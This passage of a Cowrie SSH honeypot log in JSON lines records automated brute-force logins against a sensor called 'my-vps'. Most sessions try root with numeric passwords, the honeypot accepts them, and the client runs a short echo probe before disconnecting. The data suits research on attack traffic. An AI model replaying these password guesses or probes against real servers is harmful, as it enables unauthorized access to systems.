{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.619749Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.645580Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.login.success","username":"root","password":"18","message":"login attempt [root/18] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.716905Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:33.781950Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.782683Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.806330Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.807424Z","src_ip":"212.227.125.160","session":"527f304c0fcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53930,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb91c54645da","protocol":"ssh","message":"New connection: 212.227.125.160:53930 (1.2.3.4:22) [session: bb91c54645da]","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.828321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.829062Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.861043Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.876383Z","src_ip":"196.251.86.249","session":"bb80f625eae4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.877169Z","src_ip":"196.251.86.249","session":"bb80f625eae4"}
{"eventid":"cowrie.login.success","username":"root","password":"171819","message":"login attempt [root/171819] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:33.940346Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:34.107118Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.108276Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.132575Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.133583Z","src_ip":"212.227.125.160","session":"bb91c54645da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53932,"dst_ip":"1.2.3.4","dst_port":22,"session":"2613b6834923","protocol":"ssh","message":"New connection: 212.227.125.160:53932 (1.2.3.4:22) [session: 2613b6834923]","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.154270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.155106Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.184305Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.login.success","username":"root","password":"171291","message":"login attempt [root/171291] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.268917Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:34.382033Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.382843Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.408203Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:34.409346Z","src_ip":"212.227.125.160","session":"2613b6834923"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53944,"dst_ip":"1.2.3.4","dst_port":22,"session":"51fc0f117a0c","protocol":"ssh","message":"New connection: 212.227.125.160:53944 (1.2.3.4:22) [session: 51fc0f117a0c]","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.449924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.451176Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.474204Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.login.success","username":"root","password":"171184","message":"login attempt [root/171184] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.552287Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:35.619012Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.620104Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.645160Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.646818Z","src_ip":"212.227.125.160","session":"51fc0f117a0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53960,"dst_ip":"1.2.3.4","dst_port":22,"session":"f36422311aeb","protocol":"ssh","message":"New connection: 212.227.125.160:53960 (1.2.3.4:22) [session: f36422311aeb]","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.666610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.667492Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.692559Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.login.success","username":"root","password":"171083","message":"login attempt [root/171083] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.773655Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:35.909190Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.909940Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.933960Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.935141Z","src_ip":"212.227.125.160","session":"f36422311aeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53964,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff5cf895a553","protocol":"ssh","message":"New connection: 212.227.125.160:53964 (1.2.3.4:22) [session: ff5cf895a553]","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.955668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.956591Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:35.979015Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1q2w3e","message":"login attempt [oracle/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.047824Z","src_ip":"196.251.86.249","session":"bb80f625eae4"}
{"eventid":"cowrie.login.success","username":"root","password":"170790","message":"login attempt [root/170790] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.053814Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:36.210817Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.211526Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.236002Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.237317Z","src_ip":"212.227.125.160","session":"ff5cf895a553"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53970,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fc16af373be","protocol":"ssh","message":"New connection: 212.227.125.160:53970 (1.2.3.4:22) [session: 9fc16af373be]","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.257701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.258620Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.281095Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.login.success","username":"root","password":"170388","message":"login attempt [root/170388] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.357600Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:36.423995Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.424680Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.449565Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.450850Z","src_ip":"212.227.125.160","session":"9fc16af373be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53972,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c74d130cb03","protocol":"ssh","message":"New connection: 212.227.125.160:53972 (1.2.3.4:22) [session: 9c74d130cb03]","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.471963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:36.476904Z","src_ip":"212.227.125.160","session":"9c74d130cb03"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.c